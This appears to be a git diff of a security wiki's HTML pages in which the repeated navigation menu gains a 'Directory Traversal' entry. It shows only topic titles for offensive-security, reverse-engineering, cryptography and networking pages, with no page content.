        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -202,22 +202,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html b/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html index a1efee5d..1338e156 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html +++ b/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html b/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html index cc3dcb74..f4d7c648 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html +++ b/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
